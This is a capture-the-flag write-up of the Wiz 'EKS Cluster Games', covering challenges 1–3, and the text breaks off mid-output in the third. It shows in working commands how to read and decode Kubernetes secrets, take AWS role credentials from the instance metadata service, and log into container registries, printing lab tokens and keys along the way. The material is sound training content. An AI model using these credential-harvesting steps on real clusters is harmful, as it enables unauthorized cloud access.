Wiz CTF “EKS CLUSTER GAMES” Write Up
18 min readNov 19, 2023
Wiz released a nice CTF about Amazon Elastic Kubernetes Service (Amazon EKS) which is a managed Kubernetes service to run Kubernetes in the AWS cloud. This is a great CTF, it is very user-friendly and even if you are starting your way in this area, you can learn a lot from this.
In this post, we will go over the challenges, show the process of thinking, and solve them. I strongly suggest trying it by yourself and not looking at these solutions. Don’t give up! If you encounter terms that you are not familiar with, search on the web and read about them.
Let the games begin:
1 — Secret Seeker
According to the challenge, we need to list the secrets in the cluster and we can see that we have the required permissions:
{
"secrets": [
"get",
"list"
]
}We start by listing the secrets and find one secret:
root@wiz-eks-challenge:~# kubectl get secrets
NAME TYPE DATA AGE
log-rotate Opaque 1 3d20hLet’s see what’s inside it:
root@wiz-eks-challenge:~# kubectl get secrets -o yaml
apiVersion: v1
items:
- apiVersion: v1
data:
flag: d2l6X2Vrc19jaGFsbGVuZ2V7b21nX292ZXJfcHJpdmlsZWdlZF9zZWNyZXRfYWNjZXNzfQ==
kind: Secret
...We have the flag encoded with base64, let’s decode it and see the flag:
root@wiz-eks-challenge:~# kubectl get secrets -o json | jq -r '.items[].data.flag' | base64 -d
wiz_eks_challenge{omg_over_privileged_secret_access}2— Registry Hunt
Our permissions on this challenge:
{
"secrets": [
"get"
],
"pods": [
"list",
"get"
]
}Interestingly, we can’t list secrets, only get. It means that only if we have the name of the secret, we can view it.
In this challenge we need to check the container registries. We have permission to list the pods so we will start with that:
root@wiz-eks-challenge:~# kubectl get pods
NAME READY STATUS RESTARTS AGE
database-pod-2c9b3a4e 1/1 Running 0 3d19hThe full details of the pod:
root@wiz-eks-challenge:~# kubectl get pods -o yaml
apiVersion: v1
items:
- apiVersion: v1
kind: Pod
metadata:
annotations:
kubernetes.io/psp: eks.privileged
pulumi.com/autonamed: "true"
creationTimestamp: "2023-11-01T13:32:05Z"
name: database-pod-2c9b3a4e
namespace: challenge2
resourceVersion: "897497"
uid: 57fe7d43-5eb3-4554-98da-47340d94b4a6
spec:
containers:
- image: eksclustergames/base_ext_image
imagePullPolicy: Always
name: my-container
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
volumeMounts:
- mountPath: /var/run/secrets/kubernetes.io/serviceaccount
name: kube-api-access-cq4m2
readOnly: true
dnsPolicy: ClusterFirst
enableServiceLinks: true
imagePullSecrets:
- name: registry-pull-secrets-780bab1d
nodeName: ip-192-168-21-50.us-west-1.compute.internal
preemptionPolicy: PreemptLowerPriority
priority: 0
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
serviceAccount: default
serviceAccountName: default
terminationGracePeriodSeconds: 30
tolerations:
- effect: NoExecute
key: node.kubernetes.io/not-ready
operator: Exists
tolerationSeconds: 300
- effect: NoExecute
key: node.kubernetes.io/unreachable
operator: Exists
tolerationSeconds: 300
volumes:
- name: kube-api-access-cq4m2
projected:
defaultMode: 420
sources:
- serviceAccountToken:
expirationSeconds: 3607
path: token
- configMap:
items:
- key: ca.crt
path: ca.crt
name: kube-root-ca.crt
- downwardAPI:
items:
- fieldRef:
apiVersion: v1
fieldPath: metadata.namespace
path: namespace
status:
conditions:
- lastProbeTime: null
lastTransitionTime: "2023-11-01T13:32:05Z"
status: "True"
type: Initialized
- lastProbeTime: null
lastTransitionTime: "2023-11-01T13:32:08Z"
status: "True"
type: Ready
- lastProbeTime: null
lastTransitionTime: "2023-11-01T13:32:08Z"
status: "True"
type: ContainersReady
- lastProbeTime: null
lastTransitionTime: "2023-11-01T13:32:05Z"
status: "True"
type: PodScheduled
containerStatuses:
- containerID: containerd://b427307b7f428bcf6a50bb40ebef194ba358f77dbdb3e7025f46be02b922f5af
image: docker.io/eksclustergames/base_ext_image:latest
imageID: docker.io/eksclustergames/base_ext_image@sha256:a17a9428af1cc25f2158dfba0fe3662cad25b7627b09bf24a915a70831d82623
lastState: {}
name: my-container
ready: true
restartCount: 0
started: true
state:
running:
startedAt: "2023-11-01T13:32:08Z"
hostIP: 192.168.21.50
phase: Running
podIP: 192.168.12.173
podIPs:
- ip: 192.168.12.173
qosClass: BestEffort
startTime: "2023-11-01T13:32:05Z"
kind: List
metadata:
resourceVersion: ""We can see the image here:
root@wiz-eks-challenge:~# kubectl get pods -o yaml | grep image
- image: eksclustergames/base_ext_image
imagePullPolicy: Always
imagePullSecrets:
image: docker.io/eksclustergames/base_ext_image:latest
imageID: docker.io/eksclustergames/base_ext_image@sha256:a17a9428af1cc25f2158dfba0fe3662cad25b7627b09bf24a915a70831d82623The imagePullSecrets is interesting because it contains the name of the secret (reference):
ImagePullSecrets is an optional list of references to secrets in the same namespace to use for pulling any of the images used by this PodSpec. If specified, these secrets will be passed to individual puller implementations for them to use.
Under the imagePullSecrets we have the name of the secret:
imagePullSecrets:
- name: registry-pull-secrets-780bab1d
nodeName: ip-192-168-21-50.us-west-1.compute.internalWe already have the name of the secret so we can view it:
root@wiz-eks-challenge:~# kubectl get secrets registry-pull-secrets-780bab1d -o yaml
apiVersion: v1
data:
.dockerconfigjson: eyJhdXRocyI6IHsiaW5kZXguZG9ja2VyLmlvL3YxLyI6IHsiYXV0aCI6ICJaV3R6WTJ4MWMzUmxjbWRoYldWek9tUmphM0pmY0dGMFgxbDBibU5XTFZJNE5XMUhOMjAwYkhJME5XbFpVV280Um5WRGJ3PT0ifX19
kind: Secret
metadata:
annotations:
pulumi.com/autonamed: "true"
creationTimestamp: "2023-11-01T13:31:29Z"
name: registry-pull-secrets-780bab1d
namespace: challenge2
resourceVersion: "897340"
uid: 1348531e-57ff-42df-b074-d9ecd566e18b
type: kubernetes.io/dockerconfigjsonLet’s look at what inside the .dockerconfigjson:
root@wiz-eks-challenge:~# kubectl get secrets registry-pull-secrets-780bab1d -o json | jq -r '.data.".dockerconfigjson"' | base64 -d | jq
{
"auths": {
"index.docker.io/v1/": {
"auth": "ZWtzY2x1c3RlcmdhbWVzOmRja3JfcGF0X1l0bmNWLVI4NW1HN200bHI0NWlZUWo4RnVDbw=="
}
}
}We decode auth and get:
root@wiz-eks-challenge:~# kubectl get secrets registry-pull-secrets-780bab1d -o json | jq -r '.data.".dockerconfigjson"' | base64 -d | jq -r '.auths | to_entries[]| .value.auth' | base64 -d
eksclustergames:dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCoWe used crane to log in to the docker registry with the above credentials:
# username: eksclustergames
# password: dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCo
root@wiz-eks-challenge:~# crane auth login -u eksclustergames -p dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCo docker.io
2023/11/05 09:54:47 logged in via /home/user/.docker/config.jsonWe list the config of the image:
root@wiz-eks-challenge:~# crane config eksclustergames/base_ext_image:latest | jq
{
"architecture": "amd64",
"config": {
"Env": [
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
],
"Cmd": [
"/bin/sleep",
"3133337"
],
"ArgsEscaped": true,
"OnBuild": null
},
"created": "2023-11-01T13:32:18.920734382Z",
"history": [
{
"created": "2023-07-18T23:19:33.538571854Z",
"created_by": "/bin/sh -c #(nop) ADD file:7e9002edaafd4e4579b65c8f0aaabde1aeb7fd3f8d95579f7fd3443cef785fd1 in / "
},
{
"created": "2023-07-18T23:19:33.655005962Z",
"created_by": "/bin/sh -c #(nop) CMD [\"sh\"]",
"empty_layer": true
},
{
"created": "2023-11-01T13:32:18.920734382Z",
"created_by": "RUN sh -c echo 'wiz_eks_challenge{nothing_can_be_said_to_be_certain_except_death_taxes_and_the_exisitense_of_misconfigured_imagepullsecret}' > /flag.txt # buildkit",
"comment": "buildkit.dockerfile.v0"
},
{
"created": "2023-11-01T13:32:18.920734382Z",
"created_by": "CMD [\"/bin/sleep\" \"3133337\"]",
"comment": "buildkit.dockerfile.v0",
"empty_layer": true
}
],
"os": "linux",
"rootfs": {
"type": "layers",
"diff_ids": [
"sha256:3d24ee258efc3bfe4066a1a9fb83febf6dc0b1548dfe896161533668281c9f4f",
"sha256:a70cef1cb742e242b33cc21f949af6dc7e59b6ea3ce595c61c179c3be0e5d432"
]
}
}We can see the flag inside it:
wiz_eks_challenge{nothing_can_be_said_to_be_certain_except_death_taxes_and_the_exisitense_of_misconfigured_imagepullsecret}
3 — Image Inquisition
We start with the following permissions:
{
"pods": [
"list",
"get"
]
}We have permission to list pods and the challenge is about the pod’s image and the ECR repository so we looked inside the container image:
root@wiz-eks-challenge:~# kubectl get pods -o yaml
apiVersion: v1
items:
- apiVersion: v1
kind: Pod
metadata:
annotations:
kubernetes.io/psp: eks.privileged
pulumi.com/autonamed: "true"
creationTimestamp: "2023-11-01T13:32:10Z"
name: accounting-pod-876647f8
namespace: challenge3
resourceVersion: "897513"
uid: dd2256ae-26ca-4b94-a4bf-4ac1768a54e2
spec:
containers:
- image: 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01
imagePullPolicy: IfNotPresent
name: accounting-container
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
volumeMounts:
- mountPath: /var/run/secrets/kubernetes.io/serviceaccount
name: kube-api-access-mmvjj
readOnly: true
dnsPolicy: ClusterFirst
enableServiceLinks: true
nodeName: ip-192-168-21-50.us-west-1.compute.internal
preemptionPolicy: PreemptLowerPriority
priority: 0
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
serviceAccount: default
serviceAccountName: default
terminationGracePeriodSeconds: 30
tolerations:
- effect: NoExecute
key: node.kubernetes.io/not-ready
operator: Exists
tolerationSeconds: 300
- effect: NoExecute
key: node.kubernetes.io/unreachable
operator: Exists
tolerationSeconds: 300
volumes:
- name: kube-api-access-mmvjj
projected:
defaultMode: 420
sources:
- serviceAccountToken:
expirationSeconds: 3607
path: token
- configMap:
items:
- key: ca.crt
path: ca.crt
name: kube-root-ca.crt
- downwardAPI:
items:
- fieldRef:
apiVersion: v1
fieldPath: metadata.namespace
path: namespace
status:
conditions:
- lastProbeTime: null
lastTransitionTime: "2023-11-01T13:32:10Z"
status: "True"
type: Initialized
- lastProbeTime: null
lastTransitionTime: "2023-11-01T13:32:11Z"
status: "True"
type: Ready
- lastProbeTime: null
lastTransitionTime: "2023-11-01T13:32:11Z"
status: "True"
type: ContainersReady
- lastProbeTime: null
lastTransitionTime: "2023-11-01T13:32:10Z"
status: "True"
type: PodScheduled
containerStatuses:
- containerID: containerd://c465d5104e6f4cac49da0b7495eb2f7c251770f8bf3ce4a1096cf5c704b9ebbe
image: sha256:575a75bed1bdcf83fba40e82c30a7eec7bc758645830332a38cef238cd4cf0f3
imageID: 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01
lastState: {}
name: accounting-container
ready: true
restartCount: 0
started: true
state:
running:
startedAt: "2023-11-01T13:32:11Z"
hostIP: 192.168.21.50
phase: Running
podIP: 192.168.5.251
podIPs:
- ip: 192.168.5.251
qosClass: BestEffort
startTime: "2023-11-01T13:32:10Z"
kind: List
metadata:
resourceVersion: ""We have the container image:
688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7cBut that’s it and in order to dive deep into the ECR repository we need to log in to the repository with crane.
We start by looking for credentials that can help us connect to the ECR repository. When working in a cloud environment, one way to check for interesting data is to look over the Amazon Metadata Service (IMDS). Looking over some of the APIs we found some interesting credentials:
root@wiz-eks-challenge:~# curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/info
{}
root@wiz-eks-challenge:~# curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials
ec2-instanceroot@wiz-eks-challenge:~# curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance
{}
root@wiz-eks-challenge:~# curl http://169.254.169.254/latest/meta-data/iam/security-credentials
eks-challenge-cluster-nodegroup-NodeInstanceRole
root@wiz-eks-challenge:~# curl http://169.254.169.254/latest/meta-data/iam/security-credentials/eks-challenge-cluster-nodegroup-NodeInstanceRole | jq
{
"AccessKeyId": "ASIA2AVYNEVMSAUIBIHQ",
"Expiration": "2023-11-05 16:12:10+00:00",
"SecretAccessKey": "OZG50na54oGIaiGn2Vc07puNp9WBvlRScemRdMKN",
"SessionToken": "FwoGZXIvYXdzEFEaDGwq4kiyacXn2zrlhiK3ATbgJsxPS1OOMdcXAA/2goG1num3v/+MLgFGLNvbpQk0krshYkhfhuOxbf+vhbcBFeYdQbgzj/1PUvObdFSIw9dOuIisbyS+KT6acZfF/e0hsGLcsShiKVI+pXQHYMC8H8xKf4uqoStjx+55QbCT1Uo9vsJSifv0vbSjR2I50bcrEykZyMGcdrrjNlK7m4CTYcTlWDkbR0VbsFZ8Dbo6MJxqDjTSY7CAA3v9AALR0PbWc3FzVrNDDSjK4Z6qBjItxAmlTpRiOY3F3wQdGfxC+YnWIkJg9pe6BcP5B1iHSx/CMQNG67j+NdT0miAG"
}We used these credentials to create the AWS config file:
root@wiz-eks-challenge:~# aws configure
AWS Access Key ID [None]: ASIA2AVYNEVMSAUIBIHQ
AWS Secret Access Key [None]: OZG50na54oGIaiGn2Vc07puNp9WBvlRScemRdMKN
Default region name [None]: us-west-1
Default output format [None]:
# we know the region from the repostiroy link
root@wiz-eks-challenge:~# cat ~/.aws/config
[default]
region = us-west-1
# we needed to add the aws_session_token manually
root@wiz-eks-challenge:~# cat ~/.aws/credentials
[default]
aws_access_key_id = ASIA2AVYNEVMSAUIBIHQ
aws_secret_access_key = OZG50na54oGIaiGn2Vc07puNp9WBvlRScemRdMKN
aws_session_token = FwoGZXIvYXdzEFEaDGwq4kiyacXn2zrlhiK3ATbgJsxPS1OOMdcXAA/2goG1num3v/+MLgFGLNvbpQk0krshYkhfhuOxbf+vhbcBFeYdQbgzj/1PUvObdFSIw9dOuIisbyS+KT6acZfF/e0hsGLcsShiKVI+pXQHYMC8H8xKf4uqoStjx+55QbCT1Uo9vsJSifv0vbSjR2I50bcrEykZyMGcdrrjNlK7m4CTYcTlWDkbR0VbsFZ8Dbo6MJxqDjTSY7CAA3v9AALR0PbWc3FzVrNDDSjK4Z6qBjItxAmlTpRiOY3F3wQdGfxC+YnWIkJg9pe6BcP5B1iHSx/CMQNG67j+NdT0miAGWe can now get the AWS identity:
root@wiz-eks-challenge:~# aws sts get-caller-identity
{
"UserId": "AROA2AVYNEVMQ3Z5GHZHS:i-0cb922c6673973282",
"Account": "688655246681",
"Arn": "arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282"
}We used the following documentation and started to look over the ECR:
{
"repositories": [
{
"repositoryArn": "arn:aws:ecr:us-west-1:688655246681:repository/testos",
"registryId": "688655246681",
"repositoryName": "testos",
"repositoryUri": "688655246681.dkr.ecr.us-west-1.amazonaws.com/testos",
"createdAt": "2023-10-29T17:52:00+00:00",
"imageTagMutability": "MUTABLE",
"imageScanningConfiguration": {
"scanOnPush": false
},
"encryptionConfiguration": {
"encryptionType": "AES256"
}
},
{
"repositoryArn": "arn:aws:ecr:us-west-1:688655246681:repository/central_repo-aaf4a7c",
"registryId": "688655246681",
"repositoryName": "central_repo-aaf4a7c",
"repositoryUri": "688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c",
"createdAt": "2023-11-01T13:31:27+00:00",
"imageTagMutability": "MUTABLE",
"imageScanningConfiguration": {
:...skipping...
{
"repositories": [
{
"repositoryArn": "arn:aws:ecr:us-west-1:688655246681:repository/testos",
"registryId": "688655246681",
"repositoryName": "testos",
"repositoryUri": "688655246681.dkr.ecr.us-west-1.amazonaws.com/testos",
"createdAt": "2023-10-29T17:52:00+00:00",
"imageTagMutability": "MUTABLE",
"imageScanningConfiguration": {
"scanOnPush": false
},
"encryptionConfiguration": {
"encryptionType": "AES256"
}
},
{
"repositoryArn": "arn:aws:ecr:us-west-1:688655246681:repository/central_repo-aaf4a7c",
"registryId": "688655246681",
"repositoryName": "central_repo-aaf4a7c",
"repositoryUri": "688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c",
"createdAt": "2023-11-01T13:31:27+00:00",
"imageTagMutability": "MUTABLE",
"imageScanningConfiguration": {
"scanOnPush": false
},
"encryptionConfiguration": {
"encryptionType": "AES256"
}
}
]
}
root@wiz-eks-challenge:~# aws ecr describe-registry
An error occurred (AccessDeniedException) when calling the DescribeRegistry operation: User: arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282 is not authorized to perform: ecr:DescribeRegistry on resource: * because no identity-based policy allows the ecr:DescribeRegistry actionIt didn’t help us but we found some interesting commands through the help menu:
root@wiz-eks-challenge:~# aws ecr help
root@wiz-eks-challenge:~# aws ecr get-authorization-token
{
"authorizationData": [
{
"authorizationToken": "QVdTOmV5SndZWGxzYjJGa0lqb2ljRWt5UlhsamVFRlFRMjluWjNKRFJHSjJZVWRKYlRSelNGRkJZbEpwZURoak1XazVRMFEzVGpKSlNqSjBibUV3YTFScFRVUjZTbHBXUld0VVVuaDNaR1pDTUd4T1FYZFhkRmxvUms1aWNVSk9VRTlDVUVsbk1IVm9aWE5QUVZKSFpVdHFXVU5XWVRCc1RrWnVPSGxRWVd4TlZHbGhNVEZTWVRaNVRIVnhVRmxpUjBsWlMwaGFPRGRtYVhoWk1GaERZWHB5Tm5OMmRXRXdTR05VTkU4NU0zUndaV3hwTldScllWaEZjRmd4ZW5GTWFqUllLMDAyUlZGNWFHSlBZV05oWVU1d0sxRXhXazVZV25Wc1F6ZzVRMUZ2V0VJdlYybEVSbVF5YzJWbmFDOXViQzhyTUV0dUswWlJOVzAyVEZOM0t6bFdhVTFGYUdveE9UaG5NMGxDYkc5eE1XVXlhbTh4TXpkYVNrRTRaMUI2YkRRM05YQnRSMDVvUlhjMVEzcGhaMU51WWsxRFdXRlRjREp0YVdoQmFHbzJSR3RyTWpocFJFcE9iMlpNZGxCQ2VXY3JLMVpxVEV0UmEyRnRNV1p5Yld4MVRISk9lbEp4ZG1wNWJITk9NMk4zYVZodlNYQjVLeXRpZVZoQ1FUTlFRMHBOTUVneFkwaDNia2xaT0RFeWVIUTNlSEZ0WVZGbVVtRmtXVmwwY1RSVlVqVkxWWEZ2VTNOV2JIVjZXbk4yU2tSbmEyODBWblJxTVM5M1pqSjZOVEYyTnpGcFYwczVNM1V5V0dOcU1sZEpMMnhKUlZGV1RraEZkVzQyZW5BMVpWaFNSamh1VFZWVFRXNUtOVXgxYzJOb01GcE9SVEJLVVRoUWJtbHZVV0ZhZUU5Tk5rWldjak5tZUU1Q1oxbEdOMFU0TmsxSFMxSkdaRU5pTlhsU1VIVjVaV2xUU1djMmVWbE5ha0l4UkhOaE1qRm1hRXhyZUdFemFVUkplRnBUVldsa1ptdDNSRWh3TVZKWFkzWkdkVzlZTUZoMGRqRlhaWEpHUlRobFoxQkZSbFF4UW5sM1J6bHNRVFZsYVhaS04yZGpkWHBhUTJWMmVTOXJjRGw0ZURWVk5rRlRZek0xWTNOT1VtcG9lWFpoVDFSdGNVSlpPWFI0TkdRdlFtRkZTRk5ZTDFwaFZHaEhkV2RUSzIwME4zY3ZjQ3RQUlcxdVVHOVJWbkpNU1VobFpFWmxTamgyWVVoNlVIRnVlRUk1WTNwV1UxcDZUVUo2T1VSb1JWZ3dXbk5LWjNGUGJqQkVhRkpZY1U4eFNrOXBZVEZtUkdVMmJsWmtjVGRhWWpNclVEVjJXblUxTjFwclpteEZSMmhDVFRGWFp6UTFOVmRJTVVNelVrWm1NRnBIUjBaWFJuVklWREF3UkVoM09YUkZlWFJvUnpKV1VDOHhlbGczWldnMVJIb3ZaemhIUjJ3M1pHdFNiR2hFZUhCd1NqUkZjRXhwUlRWTGFrMVRPRTE0YTB0UVQycFdZMkkxWWtkUFpXUmlaRzF1UVZkaGRUWjNkRmRaU0dFeVNFZGlkSEo1U2lzeGRGRmFPVUV6UlVKUGQzcDJLMmwxVWpSck5HNXJSQ3R3U2toaWRucDRXSEp6TDFoQlVUaFNSakZCUVZCeUt6WlpRMHB6WkRCelowUmFPVEZsYTNCdVVGRmlPV1JQYkVJNVdEbExSSFY1Y0V0RWNrODNlVTlIZDNwVVRXb3lSbGx4Y0hJelFrOXFNRVJ1T0RBMVVFb3plRUpOWmpoclYzSlhUQzlLU3pSUVZXVnlLMGd3VDJscVkxZHJUeTlJU1hKRlpEaFhiM0F5WW5OVE9VTm1hekphTm10eFQwdHNOR3hxYnpaVE0wZFhaVUV4TmpoaFExVnNTRloxY25rdmEzUm1WREpwTlZGV01pdGhReXRsZDFSdU9FVnhTbFY2VlUxd1lUTlJjazlJVUdVclNVUmhjR3RsV1dkcmJYZElRMlZ4YTNjMllVWmtkM3BtVFZwUFF6WjVjRTR6SzNCaVNqVlpTak5ETm00MVVIaFhZWE5ZVGtwdFVXWm1NakpUUTNaTk9WVjFiR0YyTlcxRk5qZEZTV3RVWmxCUE1HVjVOSE5XU0ZGdWMyZE9kSGcxYjNsc01WUk9TSFJoU2xWbE5YSnlObkpUTVZBNE9UaG9SMDFrZEdWQmEySk5RMkpOTTFCaFN6bFBVRlYwUTNScVEzWktaM2hvVFVkSFFVcEdiSEZhYkVsSFNVbDBWRmRyTjI5b1lsWmtUa0ZrYzFSemJVSk5TbFl2ZEU1MlNUMGlMQ0prWVhSaGEyVjVJam9pUVZGRlFrRklhV3BGUmxoSGQwWXhZMmx3Vms5aFkwYzRjVkp0U205V1FsQmhlVGhNVlZWMlZUaFNRMVpXTUZodlNIZEJRVUZJTkhkbVFWbEtTMjlhU1doMlkwNUJVV05IYjBjNGQySlJTVUpCUkVKdlFtZHJjV2hyYVVjNWR6QkNRbmRGZDBobldVcFpTVnBKUVZkVlJFSkJSWFZOUWtWRlJFNTFhbUV3YzNCQk0wZEdlRFl5ZDFwQlNVSkZTVUUzYVRodFZVSlBVMVExYVZFclJIRkhUbWR2V0hweFZXdHhiVTA1WlRJd1IyOHlValpSZG5aRE1HOHhZWFp6YjNNNGIyOHJSMlU0ZFhKSGNXTlZVRGRPVkdkSFVGcHlNVzlpZURCemMyUjRORDBpTENKMlpYSnphVzl1SWpvaU1pSXNJblI1Y0dVaU9pSkVRVlJCWDB0RldTSXNJbVY0Y0dseVlYUnBiMjRpT2pFMk9Ua3lOREV5TmpKOQ==",
"expiresAt": "2023-11-06T03:27:42.838000+00:00",
"proxyEndpoint": "https://688655246681.dkr.ecr.us-west-1.amazonaws.com"
}
]
}
root@wiz-eks-challenge:~# aws ecr get-authorization-token | jq -r '.authorizationData[].authorizationToken' | base64 -d
AWS:eyJwYXlsb2FkIjoiMmxhYWNwQnBuYlp2TzM1UE44T3lXamZraUlXYjFzTWVBcVU3bDNGb3MxR3pNSUFjVU85QzRUVmVPVmVwcDlReUNzUERwYTliNS9GUG4vK3REVkdMQzJocHczZ3dsQU8rYk5MZzQ2aWEwUkxOL1VGV2dXN1VqMk5remZrWm5PL2xUOTJPb1V2YnluL1h0Y0NFTDNsU1NQTzNpdSs3cEhDdUcwYWhNUENiNFZvS0F4WXNYNmwrd0lGdFAyVmJWRkZMaEZ0ZVhQci90a21tOHlmQjAvdjZvVzVESXZ2NG1IbWJmbmQ4WWt0cmFIYmh0aVRnUk81STdKM1IraU9EaWJJSUxKaUV1QStjb3JlUjBrZlRkYno3eDhFNnY2NnF6cGNHYWFJcDBuam5iTzRmV3QwOE4rL01NVEhlNWNDaDNKTmF1TEtFU2FhdGhxNlhoa3NzcUhvM21TaGRXbWdESFlJa01HZXJsTUFRV3BKTDJEc2dyME41c3FzeGtnT21EZXRrMGRJMHl3VmUzTmUrdDhna3FBVHA0aXF2dWs3cFFuODQ1ckpJY09MbmdOVEtwYmc2ZVZ6dUJRMi8wSTIzVThHdEhuMzdvdkxtcklvT0cwMzgwT0x1UVpOOVcrUWxNcFN1ek5QbU5ocXpSREVWRTFQMGFDcTErcVJ2YVpZMFlFWDZ0R0t5Y3hYcEtYSXNpZVVJSlhqVzFxNTJ6bFUwK2lGYXZvK0FhRjRDRkl2SW9FVHptWUNKYi9oSGZmeWR2dXVCM2tmd0NSWVZ3bDgwV2huclNOOGIzeU5VR0dGVDlNSUpXaVNOd1BxemVING0vMm41OXB0c2thT0ppbXVkbkM3TEZrN3BYM1R3OUdrVW82SzM2NFJYekp2YldBR2c2aDBob3JTYkJqL0J1c3BnZ1g5U3B3WHc4T1VjVzdVeG12QWdvSEVhd3VUU296V1loc2YvU05BY0lES2l5VnVGTmxoTmNzd2VINkwyeWhaWDdXVUV6QjN0WktzUkNZQ2tMZFE0c0tla0RBL2tuelZObExjREFnWTFXYnB6MzJFV3VpZ0tpUTVGeEtySXZhRFpjSVN1RGNOd3lTN3hxT3cybFlCZDBwcEdWYS9pSXZOM2ZOSXBBZFZtb2twYXppMUpnWUZUOHZHZ21QbW94d2s3UFZFV0dNRjZGaXVIZ2xSY2xSQzQzY1VaSmlDLzdQRGUvd1ppMmJCWnV5ZGhobWh6czFoN3VVUjZ3NjNaeUVURDh6V0VRUHEyNGlLdHd4YWJvb09JUWs3MTgzc042aWZmV0FIOXZRbXV3OEgvYzduV0lrZDZpSTFSYkcwM3BIbjNSaTE0Y2xYVGZidlQ5YXNteFRmdmlzeTdGRHVtUGcrZzM0SXNpQkk3Nkwxd0ZlbHdYeFRHL2h4anpkcGwvdy9tZWs1Y1dSV3RRYzFrMkJPejhoR0xNN21yV0JWdTVjN3U3VVZTUkFnRU5vYTlCVXBnZXJIckFiUlRCR2RBVG01dXVsTS9xRkp1YWhjaERqd25ENUNQSGF4eFcvbnA1c3AvaFlCaXhVcWUvOHpHSFVSdW1Kd1N6cjUzaVZVLzQ4NmxFY0tDcFY4RmZjV3o3eXFIb3FMZkxEaTliRk5RczE0VXpCVWdzMmovbEFJNmdPeG40a0NZejZpWG50N2E4TVZDWURXekV6M053K2w0U0tTeWZ4ZGVXek03WHZsdEl5NGZmYVBGL2xxVkJzQT0iLCJkYXRha2V5IjoiQVFFQkFIaWpFRlhHd0YxY2lwVk9hY0c4cVJtSm9WQlBheThMVVV2VThSQ1ZWMFhvSHdBQUFINHdmQVlKS29aSWh2Y05BUWNHb0c4d2JRSUJBREJvQmdrcWhraUc5dzBCQndFd0hnWUpZSVpJQVdVREJBRXVNQkVFREUwblAzdmZta2RCaDlyd3dBSUJFSUE3ZDFhZWh6S1NYOVNBdEtweEMzQUFXK3ZFL2ZocnlFM1ZlRkRWYXFweUUxcHlwTE9YcU5NYyt6eU5Oc3kxeWJiSitZK0VVU1AvNm0rT29iQT0iLCJ2ZXJzaW9uIjoiMiIsInR5cGUiOiJEQVRBX0tFWSIsImV4cGlyYXRpb24iOjE2OTkyNDE1NzF9
root@wiz-eks-challenge:~# aws ecr get-authorization-token | jq -r '.authorizationData[].authorizationToken' | base64 -d | cut -d ':' -f 2 | base64 -d | jq
{
"payload": "XTU3H+fS8b4oMV9U/aUzRGFoJ1hNMLzQ/F0M9WfrxBfzkNINP3AJwFlqLWUSfYxaaXL9cI+0os8m8Pb6YlDod3DmRhhkAmUbIYw+auZGRj14ADsN1QTUQxfwUmbRb8fFgauVTkPLUTUJgvWAVTjfRSRYklBER4YGIfk77lCEHyAur0OQOsSZiBpcU7f1/Zp4ugo4WkNwcbt0gU0loAkraR7f5jyr8f9RUn01Y6OqZUHQIT0lUVkExYxczyii7F4a7/7FYzcSb6pBT3jebo5dtDlvY3XnGl4MmkpMpbcZuSBMeJJOWNLHFkljKwwTEN63+zaH+VVQFbV07H3x7Iv3ttPrwbQ1tPNmPvzXpj12Dzfui1siQYG0ucMYkn4s3Svt1IqoP3E/0aTZXJEGv4pJ96wVtaTKYfr78pQdu2HMXuWJKwvVTAvc/kjAmyXLJpzrA/nz6XGyu7fweJHYeQB3B3xN4MYsJ01WP5MG1rn5uZudQ9AAezPfrHJkpLukbZ5VwxVJUFI9856Sr1plYZwYJ6ktrXI/QWuDKviYGbbpU0UUjpFCriwlObsDJ1Jrn/ecTmRIcKx4dG2IP59fOZ41coDlNYGiR+nhT6VkIDO7x5AK219TytW8y+DPicwuO0t7GSMwBRZlC/R5u1BQfzXaWKBqDkHJXRjpCzRtGb2NzLONN0AyXXaZmXK7ggtw2yKwj9vSD0j7D4luKg0ccTiSxFDtTqnb1GDothzRyU8NlBhIOm9Rbdqct1UW7E8Lr3Qu1kq2WJXj6AP/YFFqkf+HYMPtFZjMnjzV8oMWV97rQ1qi+EzU3YfzvD9V7rKO3x4/QE/iYE6a7IouO5PL+9dFjXjnrNWVX4cPsHv2LjKvNmizw0zU/darm1DanOIVtcK20e5bJ+2rc5UW+sIK6mW615AWZL1kOBlEglsok4g+CdWtBhKjEmeh4rCwo5Z4wl2w9wPVPoyHh5A1VGKuDKdo3Wo6XVDyX8nTaYfk+yHDnlszwC9LJn4jGdiDGEubzNRxnIsPNpyCS+eCbOErtlr/f6EN0jQBJhjgDS12ZR2p7z4fSnvDgijpu4PjcWs+CcLfHBW22FSdM7EMkuouiwaizIqMwfMwbXFPCpp5SqJISObt7bpCApxtfT3wQiOFJQeV0u7OJ4Mlvm880uTwtLPFM8vUA3d16acFqwmwnkyGt8kv2duG0TUVSHgdd2Y7CwmpvwMd2FOk2/YnIuWgOTKDiADWafguayQBJZSntnxzkuDiSyVvLDgPJ5+werKEWJFAyEzR8ONzw/oSzyTN1vu3soQ=",
